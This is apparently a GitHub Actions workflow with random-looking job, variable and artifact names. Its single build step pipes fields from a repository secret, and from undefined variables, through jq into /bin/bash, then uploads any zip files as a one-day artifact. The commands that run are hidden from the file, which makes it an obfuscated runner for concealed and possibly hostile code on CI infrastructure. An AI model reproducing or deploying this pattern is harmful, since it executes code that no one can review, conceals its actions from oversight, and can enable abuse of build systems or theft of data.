name: dorothyworks9163
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dorothyworks9163
        env:
          p69119: ${{ secrets.p69119 }}
        run: |
          printf '%s' "$p69119" | jq -r .jl537 | /bin/bash
          printf '%s' "$k7380" | jq -r .txkym8 | /bin/bash
          printf '%s' "$o2851" | jq -r .f1 | /bin/bash
          echo $lcj65970 | jq -r .s65002 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: UZvN9xIn
          path: "*.zip"
          retention-days: 1
